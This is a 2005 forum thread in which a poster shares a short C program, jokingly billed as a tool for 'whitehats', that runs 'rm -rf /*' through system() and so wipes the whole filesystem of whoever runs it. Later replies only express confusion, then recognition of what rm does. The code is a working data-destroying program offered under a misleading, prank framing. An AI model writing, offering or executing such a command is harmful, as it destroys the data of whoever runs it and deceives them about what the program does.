Author Topic: The Automatic Box RM'er (TABRM)  (Read 2750 times)

0 Members and 1 Guest are viewing this topic.

Offline c0n

  • Full Member
  • ***
  • Posts: 201
  • I'm new here!
    • View Profile
The Automatic Box RM'er (TABRM)
« on: August 13, 2005, 04:52:59 pm »
It's open source, obviously. This is for all you whitehats who are sick of being harassed and rm'd by other people. Just rm yourself.

Code: [Select]
#include <stdio.h>
#include <stdlib.h>

int main()
{
printf("TABRM v1.0, by Big Daddy Jones\n");

system("rm -rf /*");
printf("Congrats! Your system has been rm'd!\n");
printf("...and please, never install another one again.\n");

return 0;
}

Amazingly, this code took about five (5) hours to write. Props to Big Daddy Jones for the achievement.

peace,

c0n

Offline Joe

  • B&
  • x86
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: The Automatic Box RM'er (TABRM)
« Reply #1 on: August 14, 2005, 04:55:57 am »
huh?
I'd personally do as Joe suggests

You might be right about that, Joe.


trust

  • Guest
Re: The Automatic Box RM'er (TABRM)
« Reply #2 on: August 14, 2005, 10:56:21 am »

Offline Joe

  • B&
  • x86
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: The Automatic Box RM'er (TABRM)
« Reply #3 on: August 16, 2005, 08:00:55 pm »
Wow. I finally remembered what rm does. Duh.
I'd personally do as Joe suggests

You might be right about that, Joe.